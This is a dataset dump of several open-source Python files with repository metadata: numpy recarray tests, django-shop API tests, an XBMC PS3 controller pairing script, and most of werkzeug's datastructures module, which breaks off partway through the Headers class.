assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_3(self):
# Issue #7140
a = self.data
pa = pickle.loads(pickle.dumps(a[0]))
assert_(pa.flags.c_contiguous)
assert_(pa.flags.f_contiguous)
assert_(pa.flags.writeable)
assert_(pa.flags.aligned)
def test_objview_record(self):
# https://github.com/numpy/numpy/issues/2599
dt = np.dtype([('foo', 'i8'), ('bar', 'O')])
r = np.zeros((1,3), dtype=dt).view(np.recarray)
r.foo = np.array([1, 2, 3]) # TypeError?
# https://github.com/numpy/numpy/issues/3256
ra = np.recarray((2,), dtype=[('x', object), ('y', float), ('z', int)])
ra[['x','y']] # TypeError?
def test_record_scalar_setitem(self):
# https://github.com/numpy/numpy/issues/3561
rec = np.recarray(1, dtype=[('x', float, 5)])
rec[0].x = 1
assert_equal(rec[0].x, np.ones(5))
def test_missing_field(self):
# https://github.com/numpy/numpy/issues/4806
arr = np.zeros((3,), dtype=[('x', int), ('y', int)])
assert_raises(ValueError, lambda: arr[['nofield']])
def test_find_duplicate():
l1 = [1, 2, 3, 4, 5, 6]
assert_(np.rec.find_duplicate(l1) == [])
l2 = [1, 2, 1, 4, 5, 6]
assert_(np.rec.find_duplicate(l2) == [1])
l3 = [1, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [1, 2])
l3 = [2, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [2, 1])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 3,310,966,152,427,312,600 | 38.595376 | 96 | 0.519416 | false |
drayanaindra/django-shop | shop/tests/api.py | 16 | 2260 | from shop.models.ordermodel import OrderExtraInfo, Order
from django.test.testcases import TestCase
from django.contrib.auth.models import User
from shop.tests.util import Mock
from shop.shop_api import ShopAPI
from decimal import Decimal
class ShopApiTestCase(TestCase):
def setUp(self):
self.user = User.objects.create(username="test",
email="[email protected]")
self.request = Mock()
setattr(self.request, 'user', None)
self.order = Order()
self.order.order_subtotal = Decimal('10.95')
self.order.order_total = Decimal('10.95')
self.order.shipping_cost = Decimal('0')
self.order.shipping_address_text = 'shipping address example'
self.order.billing_address_text = 'billing address example'
self.order.save()
def test_add_extra_info(self):
api = ShopAPI()
api.add_extra_info(self.order, 'test')
# Assert that an ExtraOrderInfo item was created
oei = OrderExtraInfo.objects.get(order=self.order)
self.assertEqual(oei.text, 'test')
def test_is_order_paid(self):
api = ShopAPI()
# Ensure deprecated method still works
res = api.is_order_payed(self.order)
self.assertEqual(res, False)
res = api.is_order_paid(self.order)
self.assertEqual(res, False)
def test_is_order_complete(self):
api = ShopAPI()
res = api.is_order_completed(self.order)
self.assertEqual(res, False)
def test_get_order_total(self):
api = ShopAPI()
res = api.get_order_total(self.order)
self.assertEqual(res, Decimal('10.95'))
def test_get_order_subtotal(self):
api = ShopAPI()
res = api.get_order_subtotal(self.order)
self.assertEqual(res, Decimal('10.95'))
def test_get_order_short_name(self):
api = ShopAPI()
res = api.get_order_short_name(self.order)
self.assertEqual(res, '1-10.95')
def test_get_order_unique_id(self):
api = ShopAPI()
res = api.get_order_unique_id(self.order)
self.assertEqual(res, 1)
def test_get_order_for_id(self):
api = ShopAPI()
res = api.get_order_for_id(1)
self.assertEqual(res, self.order)
| bsd-3-clause | 2,631,179,910,283,354,600 | 31.285714 | 69 | 0.630973 | false |
rellla/xbmca10 | tools/EventClients/lib/python/ps3/sixpair.py | 208 | 2903 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import usb
vendor = 0x054c
product = 0x0268
timeout = 5000
passed_value = 0x03f5
def find_sixaxes():
res = []
for bus in usb.busses():
for dev in bus.devices:
if dev.idVendor == vendor and dev.idProduct == product:
res.append(dev)
return res
def find_interface(dev):
for cfg in dev.configurations:
for itf in cfg.interfaces:
for alt in itf:
if alt.interfaceClass == 3:
return alt
raise Exception("Unable to find interface")
def mac_to_string(mac):
return "%02x:%02x:%02x:%02x:%02x:%02x" % (mac[0], mac[1], mac[2], mac[3], mac[4], mac[5])
def set_pair_filename(dirname, filename, mac):
for bus in usb.busses():
if int(bus.dirname) == int(dirname):
for dev in bus.devices:
if int(dev.filename) == int(filename):
if dev.idVendor == vendor and dev.idProduct == product:
update_pair(dev, mac)
return
else:
raise Exception("Device is not a sixaxis")
raise Exception("Device not found")
def set_pair(dev, mac):
itf = find_interface(dev)
handle = dev.open()
msg = (0x01, 0x00) + mac;
try:
handle.detachKernelDriver(itf.interfaceNumber)
except usb.USBError:
pass
handle.claimInterface(itf.interfaceNumber)
try:
handle.controlMsg(usb.ENDPOINT_OUT | usb.TYPE_CLASS | usb.RECIP_INTERFACE
, usb.REQ_SET_CONFIGURATION, msg, passed_value, itf.interfaceNumber, timeout)
finally:
handle.releaseInterface()
def get_pair(dev):
itf = find_interface(dev)
handle = dev.open()
try:
handle.detachKernelDriver(itf.interfaceNumber)
except usb.USBError:
pass
handle.claimInterface(itf.interfaceNumber)
try:
msg = handle.controlMsg(usb.ENDPOINT_IN | usb.TYPE_CLASS | usb.RECIP_INTERFACE
, usb.REQ_CLEAR_FEATURE, 8, passed_value, itf.interfaceNumber, timeout)
finally:
handle.releaseInterface()
return msg[2:8]
def set_pair_all(mac):
devs = find_sixaxes()
for dev in devs:
update_pair(dev, mac)
def update_pair(dev, mac):
old = get_pair(dev)
if old != mac:
print "Reparing sixaxis from:" + mac_to_string(old) + " to:" + mac_to_string(mac)
set_pair(dev, mac)
if __name__=="__main__":
devs = find_sixaxes()
mac = None
if len(sys.argv) > 1:
try:
mac = sys.argv[1].split(':')
mac = tuple([int(x, 16) for x in mac])
if len(mac) != 6:
print "Invalid length of HCI address, should be 6 parts"
mac = None
except:
print "Failed to parse HCI address"
mac = None
for dev in devs:
if mac:
update_pair(dev, mac)
else:
print "Found sixaxis paired to: " + mac_to_string(get_pair(dev))
| gpl-2.0 | -6,913,882,019,155,779,000 | 24.464912 | 97 | 0.594557 | false |
stevenaubertin/showsServer | lib/werkzeug/datastructures.py | 146 | 86337 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from copy import deepcopy
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper, \
to_native
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
raise TypeError('%r objects are immutable' % self.__class__.__name__)
def iter_multi_items(mapping):
"""Iterates over the items of a mapping yielding keys and values
without dropping any from more complex structures.
"""
if isinstance(mapping, MultiDict):
for item in iteritems(mapping, multi=True):
yield item
elif isinstance(mapping, dict):
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
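# Illustrative sketch (added here for clarity; not part of the original
# module).  The sample values are assumptions:
#
# >>> sorted(iter_multi_items({'a': [1, 2], 'b': 3}))
# [('a', 1), ('a', 2), ('b', 3)]
# >>> list(iter_multi_items(MultiDict([('a', 1), ('a', 2)])))
# [('a', 1), ('a', 2)]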
def native_itermethods(names):
if not PY2:
return lambda x: x
def setmethod(cls, name):
itermethod = getattr(cls, name)
setattr(cls, 'iter%s' % name, itermethod)
listmethod = lambda self, *a, **kw: list(itermethod(self, *a, **kw))
listmethod.__doc__ = \
'Like :py:meth:`iter%s`, but returns a list.' % name
setattr(cls, name, listmethod)
def wrap(cls):
for name in names:
setmethod(cls, name)
return cls
return wrap
class ImmutableListMixin(object):
"""Makes a :class:`list` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(tuple(self))
return rv
def __reduce_ex__(self, protocol):
return type(self), (list(self),)
def __delitem__(self, key):
is_immutable(self)
def __delslice__(self, i, j):
is_immutable(self)
def __iadd__(self, other):
is_immutable(self)
__imul__ = __iadd__
def __setitem__(self, key, value):
is_immutable(self)
def __setslice__(self, i, j, value):
is_immutable(self)
def append(self, item):
is_immutable(self)
remove = append
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def reverse(self):
is_immutable(self)
def sort(self, cmp=None, key=None, reverse=None):
is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
"""An immutable :class:`list`.
.. versionadded:: 0.5
:private:
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
class ImmutableDictMixin(object):
"""Makes a :class:`dict` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
@classmethod
def fromkeys(cls, keys, value=None):
instance = super(cls, cls).__new__(cls)
instance.__init__(zip(keys, repeat(value)))
return instance
def __reduce_ex__(self, protocol):
return type(self), (dict(self),)
def _iter_hashitems(self):
return iteritems(self)
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(frozenset(self._iter_hashitems()))
return rv
def setdefault(self, key, default=None):
is_immutable(self)
def update(self, *args, **kwargs):
is_immutable(self)
def pop(self, key, default=None):
is_immutable(self)
def popitem(self):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
def __delitem__(self, key):
is_immutable(self)
def clear(self):
is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
"""Makes a :class:`MultiDict` immutable.
.. versionadded:: 0.5
:private:
"""
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def _iter_hashitems(self):
return iteritems(self, multi=True)
def add(self, key, value):
is_immutable(self)
def popitemlist(self):
is_immutable(self)
def poplist(self, key):
is_immutable(self)
def setlist(self, key, new_list):
is_immutable(self)
def setlistdefault(self, key, default_list=None):
is_immutable(self)
class UpdateDictMixin(object):
"""Makes dicts call `self.on_update` on modifications.
.. versionadded:: 0.5
:private:
"""
on_update = None
def calls_update(name):
def oncall(self, *args, **kw):
rv = getattr(super(UpdateDictMixin, self), name)(*args, **kw)
if self.on_update is not None:
self.on_update(self)
return rv
oncall.__name__ = name
return oncall
def setdefault(self, key, default=None):
modified = key not in self
rv = super(UpdateDictMixin, self).setdefault(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
def pop(self, key, default=_missing):
modified = key in self
if default is _missing:
rv = super(UpdateDictMixin, self).pop(key)
else:
rv = super(UpdateDictMixin, self).pop(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
__setitem__ = calls_update('__setitem__')
__delitem__ = calls_update('__delitem__')
clear = calls_update('clear')
popitem = calls_update('popitem')
update = calls_update('update')
del calls_update
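# Illustrative sketch (added; not part of the original module): a hypothetical
# subclass whose ``on_update`` callback records every modification.
#
# >>> class TrackedDict(UpdateDictMixin, dict):
# ...     pass
# >>> calls = []
# >>> d = TrackedDict()
# >>> d.on_update = calls.append
# >>> d['answer'] = 42
# >>> d.pop('answer')
# 42
# >>> len(calls)
# 2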
class TypeConversionDict(dict):
"""Works like a regular dict but the :meth:`get` method can perform
type conversions. :class:`MultiDict` and :class:`CombinedMultiDict`
are subclasses of this class and provide the same feature.
.. versionadded:: 0.5
"""
def get(self, key, default=None, type=None):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = TypeConversionDict(foo='42', bar='blub')
>>> d.get('foo', type=int)
42
>>> d.get('bar', -1, type=int)
-1
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
"""
try:
rv = self[key]
if type is not None:
rv = type(rv)
except (KeyError, ValueError):
rv = default
return rv
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
"""Works like a :class:`TypeConversionDict` but does not support
modifications.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return TypeConversionDict(self)
def __copy__(self):
return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
"""A :class:`MultiDict` is a dictionary subclass customized to deal with
multiple values for the same key which is for example used by the parsing
functions in the wrappers. This is necessary because some HTML form
elements pass multiple values for the same key.
:class:`MultiDict` implements all standard dictionary methods.
Internally, it saves all values for a key as a list, but the standard dict
access methods will only return the first value for a key. If you want to
gain access to the other values, too, you have to use the `list` methods as
explained below.
Basic Usage:
>>> d = MultiDict([('a', 'b'), ('a', 'c')])
>>> d
MultiDict([('a', 'b'), ('a', 'c')])
>>> d['a']
'b'
>>> d.getlist('a')
['b', 'c']
>>> 'a' in d
True
It behaves like a normal dict thus all dict functions will only return the
first value when multiple values for one key are found.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
A :class:`MultiDict` can be constructed from an iterable of
``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
onwards some keyword parameters.
:param mapping: the initial value for the :class:`MultiDict`. Either a
regular dict, an iterable of ``(key, value)`` tuples
or `None`.
"""
def __init__(self, mapping=None):
if isinstance(mapping, MultiDict):
dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
elif isinstance(mapping, dict):
tmp = {}
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
tmp[key] = value
dict.__init__(self, tmp)
else:
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
dict.__init__(self, tmp)
def __getstate__(self):
return dict(self.lists())
def __setstate__(self, value):
dict.clear(self)
dict.update(self, value)
def __getitem__(self, key):
"""Return the first data value for this key;
raises KeyError if not found.
:param key: The key to be looked up.
:raise KeyError: if the key does not exist.
"""
if key in self:
return dict.__getitem__(self, key)[0]
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
"""Like :meth:`add` but removes an existing key first.
:param key: the key for the value.
:param value: the value to set.
"""
dict.__setitem__(self, key, [value])
def add(self, key, value):
"""Adds a new value for the key.
.. versionadded:: 0.6
:param key: the key for the value.
:param value: the value to add.
"""
dict.setdefault(self, key, []).append(value)
def getlist(self, key, type=None):
"""Return the list of items for a given key. If that key is not in the
        `MultiDict`, the return value will be an empty list. Just as `get`,
`getlist` accepts a `type` parameter. All items will be converted
with the callable defined there.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
"""
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return list(rv)
result = []
for item in rv:
try:
result.append(type(item))
except ValueError:
pass
return result
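    # Illustrative sketch (added; not part of the original module): values that
    # fail the ``type`` conversion are silently dropped.  Sample data assumed:
    #
    # >>> d = MultiDict([('ids', '1'), ('ids', 'x'), ('ids', '3')])
    # >>> d.getlist('ids', type=int)
    # [1, 3]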
def setlist(self, key, new_list):
"""Remove the old values for a key and add new ones. Note that the list
you pass the values in will be shallow-copied before it is inserted in
the dictionary.
>>> d = MultiDict()
>>> d.setlist('foo', ['1', '2'])
>>> d['foo']
'1'
>>> d.getlist('foo')
['1', '2']
:param key: The key for which the values are set.
:param new_list: An iterable with the new values for the key. Old values
are removed first.
"""
dict.__setitem__(self, key, list(new_list))
def setdefault(self, key, default=None):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key not in self:
self[key] = default
else:
default = self[key]
return default
def setlistdefault(self, key, default_list=None):
"""Like `setdefault` but sets multiple values. The list returned
is not a copy, but the list that is actually used internally. This
means that you can put new values into the dict by appending items
to the list:
>>> d = MultiDict({"foo": 1})
>>> d.setlistdefault("foo").extend([2, 3])
>>> d.getlist("foo")
[1, 2, 3]
:param key: The key to be looked up.
:param default: An iterable of default values. It is either copied
(in case it was a list) or converted into a list
                        before being returned.
:return: a :class:`list`
"""
if key not in self:
default_list = list(default_list or ())
dict.__setitem__(self, key, default_list)
else:
default_list = dict.__getitem__(self, key)
return default_list
def items(self, multi=False):
"""Return an iterator of ``(key, value)`` pairs.
:param multi: If set to `True` the iterator returned will have a pair
for each value of each key. Otherwise it will only
contain pairs for the first value of each key.
"""
for key, values in iteritems(dict, self):
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
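    # Illustrative sketch (added; not part of the original module): ``multi``
    # controls whether repeated keys appear once or once per value.
    #
    # >>> d = MultiDict([('a', 'b'), ('a', 'c')])
    # >>> list(d.items())
    # [('a', 'b')]
    # >>> list(d.items(multi=True))
    # [('a', 'b'), ('a', 'c')]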
def lists(self):
"""Return a list of ``(key, values)`` pairs, where values is the list
of all values associated with the key."""
for key, values in iteritems(dict, self):
yield key, list(values)
def keys(self):
return iterkeys(dict, self)
__iter__ = keys
def values(self):
"""Returns an iterator of the first value on every key's value list."""
for values in itervalues(dict, self):
yield values[0]
def listvalues(self):
"""Return an iterator of all values associated with a key. Zipping
:meth:`keys` and this is the same as calling :meth:`lists`:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> zip(d.keys(), d.listvalues()) == d.lists()
True
"""
return itervalues(dict, self)
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self)
def deepcopy(self, memo=None):
"""Return a deep copy of this object."""
return self.__class__(deepcopy(self.to_dict(flat=False), memo))
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first value for each key.
:return: a :class:`dict`
"""
if flat:
return dict(iteritems(self))
return dict(self.lists())
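    # Illustrative sketch (added; not part of the original module):
    #
    # >>> d = MultiDict([('a', 'b'), ('a', 'c')])
    # >>> d.to_dict()
    # {'a': 'b'}
    # >>> d.to_dict(flat=False)
    # {'a': ['b', 'c']}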
def update(self, other_dict):
"""update() extends rather than replaces existing key lists."""
for key, value in iter_multi_items(other_dict):
MultiDict.add(self, key, value)
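    # Illustrative sketch (added; not part of the original module): ``update``
    # appends to existing value lists instead of overwriting them.
    #
    # >>> d = MultiDict([('a', 'b')])
    # >>> d.update({'a': 'c'})
    # >>> d.getlist('a')
    # ['b', 'c']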
def pop(self, key, default=_missing):
"""Pop the first item for a list on the dict. Afterwards the
key is removed from the dict, so additional values are discarded:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> d.pop("foo")
1
>>> "foo" in d
False
:param key: the key to pop.
:param default: if provided the value to return if the key was
not in the dictionary.
"""
try:
return dict.pop(self, key)[0]
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
def popitem(self):
"""Pop an item from the dict."""
try:
item = dict.popitem(self)
return (item[0], item[1][0])
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def poplist(self, key):
"""Pop the list for a key from the dict. If the key is not in the dict
an empty list is returned.
.. versionchanged:: 0.5
If the key does no longer exist a list is returned instead of
raising an error.
"""
return dict.pop(self, key, [])
def popitemlist(self):
"""Pop a ``(key, list)`` tuple from the dict."""
try:
return dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo):
return self.deepcopy(memo=memo)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
"""Works like a regular :class:`MultiDict` but preserves the
order of the fields. To convert the ordered multi dict into a
list you can use the :meth:`items` method and pass it ``multi=True``.
In general an :class:`OrderedMultiDict` is an order of magnitude
slower than a :class:`MultiDict`.
.. admonition:: note
Due to a limitation in Python you cannot convert an ordered
multi dict into a regular dict by using ``dict(multidict)``.
Instead you have to use the :meth:`to_dict` method, otherwise
the internal bucket objects are exposed.
"""
def __init__(self, mapping=None):
dict.__init__(self)
self._first_bucket = self._last_bucket = None
if mapping is not None:
OrderedMultiDict.update(self, mapping)
def __eq__(self, other):
if not isinstance(other, MultiDict):
return NotImplemented
if isinstance(other, OrderedMultiDict):
iter1 = iteritems(self, multi=True)
iter2 = iteritems(other, multi=True)
try:
for k1, v1 in iter1:
k2, v2 = next(iter2)
if k1 != k2 or v1 != v2:
return False
except StopIteration:
return False
try:
next(iter2)
except StopIteration:
return True
return False
if len(self) != len(other):
return False
for key, values in iterlists(self):
if other.getlist(key) != values:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def __getstate__(self):
return list(iteritems(self, multi=True))
def __setstate__(self, values):
dict.clear(self)
for key, value in values:
self.add(key, value)
def __getitem__(self, key):
if key in self:
return dict.__getitem__(self, key)[0].value
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
self.poplist(key)
self.add(key, value)
def __delitem__(self, key):
self.pop(key)
def keys(self):
return (key for key, value in iteritems(self))
__iter__ = keys
def values(self):
return (value for key, value in iteritems(self))
def items(self, multi=False):
ptr = self._first_bucket
if multi:
while ptr is not None:
yield ptr.key, ptr.value
ptr = ptr.next
else:
returned_keys = set()
while ptr is not None:
if ptr.key not in returned_keys:
returned_keys.add(ptr.key)
yield ptr.key, ptr.value
ptr = ptr.next
def lists(self):
returned_keys = set()
ptr = self._first_bucket
while ptr is not None:
if ptr.key not in returned_keys:
yield ptr.key, self.getlist(ptr.key)
returned_keys.add(ptr.key)
ptr = ptr.next
def listvalues(self):
for key, values in iterlists(self):
yield values
def add(self, key, value):
dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
def getlist(self, key, type=None):
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return [x.value for x in rv]
result = []
for item in rv:
try:
result.append(type(item.value))
except ValueError:
pass
return result
def setlist(self, key, new_list):
self.poplist(key)
for value in new_list:
self.add(key, value)
def setlistdefault(self, key, default_list=None):
raise TypeError('setlistdefault is unsupported for '
'ordered multi dicts')
def update(self, mapping):
for key, value in iter_multi_items(mapping):
OrderedMultiDict.add(self, key, value)
def poplist(self, key):
buckets = dict.pop(self, key, ())
for bucket in buckets:
bucket.unlink(self)
return [x.value for x in buckets]
def pop(self, key, default=_missing):
try:
buckets = dict.pop(self, key)
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return buckets[0].value
def popitem(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, buckets[0].value
def popitemlist(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
return dump_options_header(value, dict((k.replace('_', '-'), v)
for k, v in kw.items()))
def _unicodify_header_value(value):
if isinstance(value, bytes):
value = value.decode('latin-1')
if not isinstance(value, text_type):
value = text_type(value)
return value
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
"""An object that stores some headers. It has a dict-like interface
but is ordered and can store the same keys multiple times.
This data structure is useful if you want a nicer way to handle WSGI
headers which are stored as tuples in a list.
From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
and will render a page for a ``400 BAD REQUEST`` if caught in a
catch-all for HTTP exceptions.
Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
class, with the exception of `__getitem__`. :mod:`wsgiref` will return
`None` for ``headers['missing']``, whereas :class:`Headers` will raise
a :class:`KeyError`.
To create a new :class:`Headers` object pass it a list or dict of headers
which are used as default values. This does not reuse the list passed
to the constructor for internal usage.
:param defaults: The list of default values for the :class:`Headers`.
.. versionchanged:: 0.9
This data structure now stores unicode values similar to how the
multi dicts do it. The main difference is that bytes can be set as
well which will automatically be latin1 decoded.
.. versionchanged:: 0.9
The :meth:`linked` function was removed without replacement as it
was an API that does not support the changes to the encoding model.
"""
def __init__(self, defaults=None):
self._list = []
if defaults is not None:
if isinstance(defaults, (list, Headers)):
self._list.extend(defaults)
else:
self.extend(defaults)
def __getitem__(self, key, _get_mode=False):
if not _get_mode:
if isinstance(key, integer_types):
return self._list[key]
elif isinstance(key, slice):
return self.__class__(self._list[key])
if not isinstance(key, string_types):
raise exceptions.BadRequestKeyError(key)
ikey = key.lower()
for k, v in self._list:
if k.lower() == ikey:
return v
# micro optimization: if we are in get mode we will catch that
# exception one stack level down so we can raise a standard
# key error instead of our special one.
if _get_mode:
raise KeyError()
raise exceptions.BadRequestKeyError(key)
def __eq__(self, other):
return other.__class__ is self.__class__ and \
set(other._list) == set(self._list)
def __ne__(self, other):
return not self.__eq__(other)
def get(self, key, default=None, type=None, as_bytes=False):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = Headers([('Content-Length', '42')])
>>> d.get('Content-Length', type=int)
42
If a headers object is bound you must not add unicode strings
because no encoding takes place.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
:param as_bytes: return bytes instead of unicode strings.
"""
try:
rv = self.__getitem__(key, _get_mode=True)
except KeyError:
return default
if as_bytes:
rv = rv.encode('latin1')
if type is None:
return rv
try:
return type(rv)
except ValueError:
return default
def getlist(self, key, type=None, as_bytes=False):
"""Return the list of items for a given key. If that key is not in the
:class:`Headers`, the return value will be an empty list. Just as
        :meth:`get`, :meth:`getlist` accepts a `type` parameter. All items will
be converted with the callable defined there.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
:param as_bytes: return bytes instead of unicode strings.
"""
ikey = key.lower()
result = []
for k, v in self:
if k.lower() == ikey:
if as_bytes:
v = v.encode('latin1')
if type is not None:
try:
v = type(v)
except ValueError:
continue
result.append(v)
return result
def get_all(self, name):
"""Return a list of all the values for the named field.
This method is compatible with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.get_all` method.
"""
return self.getlist(name)
def items(self, lower=False):
for key, value in self:
if lower:
key = key.lower()
yield key, value
def keys(self, lower=False):
for key, _ in iteritems(self, lower):
yield key
def values(self):
for _, value in iteritems(self):
yield value
def extend(self, iterable):
"""Extend the headers with a dict or an iterable yielding keys and
values.
"""
if isinstance(iterable, dict):
for key, value in iteritems(iterable):
if isinstance(value, (tuple, list)):
for v in value:
self.add(key, v)
else:
self.add(key, value)
else:
for key, value in iterable:
self.add(key, value)
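    # Illustrative sketch (added; not part of the original module): extending
    # with a dict whose values are lists adds one header per list item.
    #
    # >>> h = Headers()
    # >>> h.extend({'X-Tag': ['a', 'b']})
    # >>> h.getlist('X-Tag') == ['a', 'b']
    # True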
def __delitem__(self, key, _index_operation=True):
if _index_operation and isinstance(key, (integer_types, slice)):
del self._list[key]
return
key = key.lower()
new = []
for k, v in self._list:
if k.lower() != key:
new.append((k, v))
self._list[:] = new
def remove(self, key):
"""Remove a key.
:param key: The key to be removed.
"""
return self.__delitem__(key, _index_operation=False)
def pop(self, key=None, default=_missing):
"""Removes and returns a key or index.
:param key: The key to be popped. If this is an integer the item at
                    that position is removed; if it's a string, the value for
that key is. If the key is omitted or `None` the last
item is removed.
:return: an item.
"""
if key is None:
return self._list.pop()
if isinstance(key, integer_types):
return self._list.pop(key)
try:
rv = self[key]
self.remove(key)
except KeyError:
if default is not _missing:
return default
raise
return rv
def popitem(self):
"""Removes a key or index and returns a (key, value) item."""
return self.pop()
def __contains__(self, key):
"""Check if a key is present."""
try:
self.__getitem__(key, _get_mode=True)
except KeyError:
return False
return True
has_key = __contains__
def __iter__(self):
"""Yield ``(key, value)`` tuples."""
return iter(self._list)
def __len__(self):
return len(self._list)
def add(self, _key, _value, **kw):
"""Add a new header tuple to the list.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes::
>>> d = Headers()
>>> d.add('Content-Type', 'text/plain')
>>> d.add('Content-Disposition', 'attachment', filename='foo.png')
The keyword argument dumping uses :func:`dump_options_header`
behind the scenes.
.. versionadded:: 0.4.1
